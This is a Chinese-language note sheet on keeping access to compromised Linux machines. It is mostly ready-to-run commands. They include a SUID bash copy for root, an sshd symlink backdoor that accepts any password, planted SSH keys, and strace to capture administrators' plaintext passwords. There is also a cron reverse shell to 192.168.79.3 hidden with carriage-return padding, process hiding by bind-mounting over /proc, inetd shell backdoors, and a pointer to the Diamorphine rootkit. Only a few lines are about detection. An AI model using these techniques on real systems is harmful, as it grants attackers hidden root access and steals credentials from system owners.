Linux 权限维持

1.1 文件创建时间

touch 命令

 

1.2文件锁定

chattr +i evil.php #锁定文件

rm -rf evil.php #提示禁止删除

lsattr evil.php #属性查看

chattr -i evil.php #解除锁定

rm -rf evil.php #彻底删除文件

 

1.3 历史操作命令

 

1.4 passwd增加用户

到了权限维持我们是默认是root权限了

passwd无法修改直接chmod修改权限即可

 

2. suid后门

使用普通用户账密ssh连接

运行suid后门会自动提权到root权限

创建suid权限文件

cp /bin/bash /tmp/.woot

chmod 4755 /tmp/.woot

ls -al /tmp/.woot

-rwsr-xr-x 1 root root 690668 Jul 24 17:14 .woot

 

3.SSH 后门

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

直接连接即可

密码随便输入

 

3.2 SSH 公钥免密码登陆

在root权限下直接生成公钥

ssh-keygen -t rsa //生成公钥

cat id_rsa.pub > authorized_keys //将id_rsa.pub内容放到目标.ssh/authorized_keys里

使用公钥连接

chmod 600 id_rsa

ssh -i id_rsa root@192.168.0.113

 

3.3 SSH Keylogger记录密码、

当前系统如果存在strace的话，它可以跟踪任何进程的系统调用和数据，可以利用 strace 系统调试工具

获取 ssh 的读写连接的数据，以达到抓取管理员登陆其他机器的明文密码的作用。

我在复现这个过程中 

`date '+%d%h%m%s'`

这块加里头就跑不出来

删了就好了

strace 主要是用来记录其他用户的明文密码的

 

4.Ubuntu利用Cron机制安装后门

执行命令将反弹shell加入计划任务

(crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >&

/dev/tcp/192.168.79.3/2334 0>&1';\r%100c\n")|crontab -

主要是做隐藏

查看的话就 crontab -e 编辑任务

其他的如

cat /var/spool/cron/crontabs/root

等

查看不到的

 

 

5.vim python 扩展后门

首先建立一个后门的python文件

然后run 它

最主要的是隐藏并删除这个后门

(nohup vim -E -c "py3file dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

但是这个时候进程还是可以看到的

就得隐藏进程

mkdir null

mount --bind null /proc/6238

netstat -anpt

那怎么看到被隐藏的进程呢

sudo umount /proc/2607

sudo netstat -anpt

ps aux | grep 2607

 

8.inetd服务后门

下载inetd后然后配置文件就好了

要检查inet有没有被植入后门

得检查inetd.conf文件

inetd是一个监听外部网络请求(就是一个socket)的系统守护进程，默认情况下为13端口。当inetd接收到

一个外部请求后，它会根据这个请求到自己的配置文件中去找到实际处理它的程序，然后再把接收到的

这个socket交给那个程序去处理。所以，如果我们已经在目标系统的inetd配置文件中配置好，那么来自

外部的某个socket是要执行一个可交互的shell，就获取了一个后门。

 

13 Rootkit

内核级隐藏我看不太懂

但它的使用方法十分的简洁

https://github.com/m0nad/Diamorphine.git

扶梯子去看吧

使用说明都有的